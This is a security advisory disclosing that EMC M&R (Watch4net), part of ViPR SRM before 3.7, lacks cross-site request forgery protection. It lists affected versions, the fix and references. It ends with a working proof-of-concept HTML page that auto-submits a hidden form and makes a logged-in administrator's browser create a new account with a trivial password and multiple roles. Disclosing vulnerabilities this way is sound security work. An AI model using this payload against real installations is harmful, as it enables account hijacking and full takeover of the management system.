EMC ViPR SRM Cross Site Request Forgery

`------------------------------------------------------------------------  
EMC M&R (Watch4net) lacks Cross-Site Request Forgery protection  
------------------------------------------------------------------------  
Han Sahin, November 2014  
  
------------------------------------------------------------------------  
Abstract  
------------------------------------------------------------------------  
It was discovered that EMC M&R (Watch4net) does not protect against  
Cross-Site Request Forgery (CSRF) attacks. A successful CSRF attack can  
compromise end user data and may allow an attacker to perform an account  
hijack. If the targeted end user is the administrator account, this  
results in a full compromise of Watch4net.  
  
------------------------------------------------------------------------  
Affected versions  
------------------------------------------------------------------------  
Versions of EMC ViPR SRM prior to version 3.7 are affected by these  
vulnerabilities.  
  
------------------------------------------------------------------------  
See also  
------------------------------------------------------------------------  
- http://seclists.org/bugtraq/2016/Apr/att-106/ESA-2016-039.txt  
- CVE-2016-0891  
  
------------------------------------------------------------------------  
Fix  
------------------------------------------------------------------------  
EMC released 34247_ViPR-SRM to fix these vulnerabilities. Please  
note that this fix is only available for registered EMC Online Support  
customers.  
  
------------------------------------------------------------------------  
Details  
------------------------------------------------------------------------  
https://www.securify.nl/advisory/SFY20141109/emc_m_r__watch4net__lacks_cross_site_request_forgery_protection.html  
  
The following proof of concept will create a new user named CSRF with password set to 1 in Watch4net - provided that the victim is logged in with an administrator account.  
  
<html>  
<body>  
<form action="http://<target>:58080/APG/admin/form" method="POST">  
<input type="hidden" name="form-id" value="UserForm" />  
<input type="hidden" name="ident" value="" />  
<input type="hidden" name="old" value="" />  
<input type="hidden" name="name" value="CSRF" />  
<input type="hidden" name="password" value="1" />  
<input type="hidden" name="confirm" value="1" />  
<input type="hidden" name="title" value="" />  
<input type="hidden" name="first-name" value="Han" />  
<input type="hidden" name="last-name" value="Sahin" />  
<input type="hidden" name="email" value="[email protected]" />  
<input type="hidden" name="role" value="user" />  
<input type="hidden" name="profile" value="0" />  
<input type="hidden" name="user-roles" value="5" />  
<input type="hidden" name="user-roles" value="1" />  
<input type="hidden" name="user-roles" value="3" />  
<input type="hidden" name="user-roles" value="4" />  
<input type="hidden" name="user-roles" value="2" />  
<input type="hidden" name="user-roles" value="6" />  
<input type="hidden" name="filter" value="" />  
<input type="hidden" name="custom" value="true" />  
<input type="submit" value="Submit request" />  
</form>  
<script>  
document.forms[0].submit();  
</script>  
</body>  
</html>  
  
`